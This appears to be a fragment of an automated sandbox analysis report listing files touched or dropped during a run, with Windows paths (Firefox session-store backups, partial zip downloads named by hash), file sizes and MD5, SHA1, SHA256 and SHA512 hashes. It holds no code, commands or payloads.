SHA25634cdab3a7e0ebf5b816465bd41e1370bd4cbd6de06070fed9c710ea321acfb1a
SHA512bd315180c9e9e8b9b6e93262bd0a94d910b1bd15e50322afc297a56491f2905c4933557f8e2187c7b771506916a7d5f5b251dc8c2e7238875f67a8ef6e02c118
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zsdzw49h.default-release\sessionstore-backups\recovery.baklz4
Filesize8KB
MD5390f2e70c44e703ef0fb64407ae3faa7
SHA1a2aa629e82ace5c3ada1735d059bb96232b6f190
SHA25633ef4afa7a2e7f5ad3874ed96e304caf1218ad6d40787dfdd90872438d770936
SHA51258b0b344dbea6516d0b37717d7ae9cf655652f83c2dacc3d6ae02c30d94d16499783fe2a4f47f104d416ecffdc4acb6d9d11e6654b1b177225e2b924dcb20b36
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zsdzw49h.default-release\sessionstore-backups\recovery.baklz4
Filesize8KB
MD511fb62d9a8f62ee8cab2b28173411c6e
SHA142b0e93a24fe4f84931779b76b7b1398abcf7abb
SHA2562d6f8adbcc24c2e90a02c8cfd762067955948f8da1182f06f1140d1263061e6e
SHA512fe069101b50929a543a20e335794a86e2c8a4614c0d2465d00369db0a2403ef6b315fb60870af6b6fbbbabdebeb251785dee4a4e3f7f4202d4d40e211e9cde52
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zsdzw49h.default-release\sessionstore-backups\recovery.baklz4
Filesize8KB
MD59c4d21ee8282d2a59771d46a57b3656b
SHA12eee0853a361a7ab6581a382709fab9942f17b92
SHA2563c6ad71b3b4b5ae8b39966595591e8b1558de96c32a73753f2854584c35b3efa
SHA512f2b30fbedb4ba3bdeec467d9cc75f93cdeeace2c0c13a78bc1a9ba5aa85ebee9587f8e0ddcbf8bc830e6502b445b8dcd50d46a40dc4a8288f137dbd000c03069
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zsdzw49h.default-release\sessionstore-backups\recovery.baklz4
Filesize8KB
MD5fa15b90cdc46e8be13d0741130229a85
SHA1f9015c9c6c5449f8fc8939f2bdc024e187121c64
SHA25617d2ab860ec594c035920a02d30047ba7e9294bb0fab23d5f44c5a85a277ebdd
SHA5127802453e88e6ba7420f4646738c7b7c19ddac6e0e4a5fa8b6eae5bd8f0498e15acf8cc4c0d62716d678fa14194386231e77b4631ccb54757e1860850afcf8a7b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zsdzw49h.default-release\sessionstore-backups\recovery.baklz4
Filesize8KB
MD55a4c7099c3d8627c7d50c0d23bdb3529
SHA145c8d5c09f3616bc8faabe3b97fec0c1c0d6c053
SHA2563f72ce2ccf208deb4ffce2a5fcb9aa6567114972417eeb1f241112bdcc645fd8
SHA5122f00ebf782409b0828fa54ee48aa5cecee0e9bea5d54886a6fba6c6025180f16dab8310f5382ba25bb98fd9bd014a74fcc88a86ec87c9ff14c46d18371ef08e5
-
Filesize
224KB
MD57a5ccb33e12f5ab17d2d7b653175d09b
SHA1b1dd02ff086f12db4ab24c86deb985328cb88cb9
SHA25699e8b13e7c266204028c387f2cc0057731700a8828d3728b8a3b687de6298978
SHA51280e2de83de8386cbb3a958e7d5af680fcb5f8885b16691bd04fd429f1bb5614567c372b38898488ca8c9611da2c57e4754a1eac3b4d0a0b1fe74f35e83fcb953
-
Filesize
194KB
MD5fd49ae8d5956af06993492b29db03d73
SHA197d68a0f12dcb76c58f182fd7341739731e33b1e
SHA2560c9e474f7402c958fe8c3cedb97a4830a67599f7a2766aee93cd0c41943db0c1
SHA512442ab90f104cc9e39996d486a205c3af2d65f25abd261114e1a62c49007f0141a575536b8f79b3df15a6b26bb11a2742adecfee1da46510d46fa10e8cbed79e9
-
C:\Users\Admin\Downloads\a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.FdwAYEbc.zip.part
Filesize579KB
MD58f66a54923518c38503c455859d4c051
SHA1f82d077b629cff530f88a51e44668475700632a2
SHA256b311299db9315b08faf8ac0cd373759f59030e8b4b5e5bd11726c80c35134819
SHA5129118821203d7ac1f918aedd1453ef259e47c3e0ceb182fa5c0a2897b3a57860509516e27d0a7e3e3825c109afa102a957fb390ede1e32d1ecd2653b55b671b7d
-
Filesize
883KB
MD55761dcb8640793699cd177a59cf2c0ed
SHA181ca3ccc56eae9b91b31ebe9f791e03226710204
SHA256a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e
SHA512a9c8020e098fac8e6bdab0ef0c09e42125e4c56b3b37c76ec7ba978c46620af95394b3f608482cc6ee9683d54457a095e0054902bd9d11cff368b64cc6bb6ff4
-
C:\Users\Admin\Downloads\e05390c002d75c6207dc490d9984b38cb095515bb2243be26b9c0fbe6ef2eff3._ImjAktx.zip.part
Filesize631KB
MD57adb6c76d3896fb4f339c5e7720a0892
SHA16f13dab529335d1c43d43bea0747461bbbc3acdf
SHA256fb2dd143813622d6740b99d3b12592ef649a716fe120b09606027b21d3b2f04c
SHA512f67855226dc67f67dfe09ecc78f7eb811cc1ae2238ff31a62d5f71ad09f47ce7747660407f14e33c2506e65782d7403fc940a994b77ac0ffffa4b58da1202e71
-
Filesize
134KB
MD59ee6fd07305f1e09c8a4d90a28a96986
SHA1a256cfd1076189baa474b910364cec90c46c01c0
SHA256125bd1ce05cab836d23c164e0bbf1bb48a253bb4121307e99663e5f6df2ef1e1
SHA5123463c670c57f258c731063f87995e59eb27610c753373a4181a1fa129fbca2263f238e4206c9eb5d620293397e4940b3e213da22cbf141eab5055ec5f4158f32
-
Filesize
652B
MD506a0506669dd12a2fc7880abfe1b70a0
SHA1fe9a91c24b37fe61fbf07a492f64586144d52bad
SHA2566b4d8cc75ba5b407c29f00f714ea667571f9619f2efb6f8601f81e9c5f93c688
SHA51247ed7245ff450131904d1beeb9a7ff68e353e2d6910e9c9c470f7c6c695b426aaace99b990c42e32308c504cf4fcf20164e40ff719cef5146bb3070ce229bf6a
-
Filesize
369B
MD5f7a027bf71158b2e8a72d90f38807b41
SHA1e9eb8ef06975d3854ec5446c21126b7c7975edc5
SHA256c36508a10534dff1cf3a7e5182e90a512f5cb6fab3370087ee2f01fe96af8265
SHA51219fee5afad853d79e8b13a70171cfa54d81bda197ea148ba1e517be28b2239e12ebf8807f9dfc26098f4bca8230b5d89d18144f9ae09dbcbd8289c26bc9c3d06
-
Filesize
652B
MD5762849c2d1c9be97571f431126b89367
SHA1a9b0dcc99f22fee89fb6f62dd32f0b9b3cd68b81
SHA256a3d6201472fc278be3fa6ba6cee63c708663b41f414a3f9bf0602bb84d9893e0
SHA512477bdee7665e15fba34a299426a7e2a17e5bd4f17e6724a7269f700f7ec5cb08aa5a29df76bb9da549b37add8998fb40f4e1d2c0d0a725bfe7c65d851d6ec696
-
Filesize
49KB
MD518d0b2662561bed1519315c05f869003
SHA148f50e1bf21d88f444a432571695f67f70f87001
SHA256b626905754ab2b7dba505b044af76b78c3413100ffcac357fa8801381cd57712
SHA51274d0f3aa3ad7b98fed0002ea356a1b373d7af939d46db41ea1e611720b0dcdceb31ffc5af41498338b34825c22cf1164f58e66319c0817a39b0fb0568fd8007f
-
Filesize
369B
MD53517453649a056df95653c0b41245af9
SHA1b8ced158ce66e84ea264b7f8c7a56f7468c3ef06
SHA256437361e4586ad8ee4ea024d1edfda3224bdf6779accf5856cfa2972c5fca8b12
SHA51214a4cab0bd3cfa6574ff21d11058361a59117201c1a5117b77e45017cc46fae083dd4009d18503946c8a90dec82eb16122484c02d941638ea778d4c18448304a